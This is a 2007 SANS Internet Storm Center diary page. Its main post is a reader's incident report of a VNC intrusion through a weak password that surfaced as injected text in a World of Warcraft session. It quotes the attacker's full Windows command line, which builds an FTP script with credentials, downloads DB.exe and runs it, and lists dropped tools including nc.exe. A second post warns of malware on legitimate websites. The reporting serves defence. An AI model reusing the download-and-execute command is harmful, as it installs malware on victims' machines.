Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!


Published: 2007-11-10
Last Updated: 2007-11-11 23:16:23 UTC
by Koon Yaw Tan (Version: 2)
0 comment(s)

Our reader Oscar shared with us that when he was playing world of warcraft, he suddenly lost control and got some "strange" lines appearing (injected command strings displayed within his WoW session). Below is a screenshot.

As he is also running a VNC server with a fairly easy guess password, this is what he got a couple of files:
* DB.exe
* hirc.exe
* nc.exe
* PI.exe
* vnckiller.exe

If you have encountered similar experience, let us know.

Lesson learnt: If you put any services expose to Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks Oscar for sharing.


Oscar wrote back and gave us a detailed description of what happened.  Here is what he said:

So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.

So I was walking back out of the hearth spot, and my character started spinning around in circles, then my charter said "aaaaaaaaa"

then, what looked like code was also spoken by my character "%systemroot%\system32\cmd.exe and then /c echo open 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit So, This seemed curious, since I wasn't even on a windows platform, so I manually logged into the ftp server, did  a mget * and thought the SANS folks would be interested in these files.

Now, how did they get in?  My guess here is that I had just installed the latest and greatest version of my favorite companies OS, and I turned a feature called Screen sharing, and also X'd the option to allow VNC users to logon with a password.  Well, the password i picked was pretty guessable.  When I logged into previously mentioned ftp site, a program there was called vnckiller.exe So i would aseume thats how they got in.  Lesson for the Day: Even if your turning on a feature for testing purposes, don't choose a easy password, as most likely, you'll forget to turn off this feature, and be rooted.  Thank goodness I wasn't

A question for our readers:  has anybody seen this happen to their session in WoW or any other virtual world simulation?

0 comment(s)

"Malicious" Websites

Published: 2007-11-10
Last Updated: 2007-11-10 21:26:57 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)

Previously, we often warn people from visiting unknown/suspicious websites as they could contain malicious content. But nowadays, even visiting known websites, you could be affected. It was reported that the India Times website contains hundreds of malicious files that could infected those visit the website.

Legitimate websites containing malicious content is not something new as it has already happened a couple of times. Web administrators must be prudent to ensure their websites are properly secure. Hackers are now clever enough not to deface your websites to alert you but rather plant malicious content on them and wait for victims. Periodically running a vulnerability scan on your web systems is necessary to avoid known holes. Let us know if you have other good tips for the web admin.

0 comment(s)
Diary Archives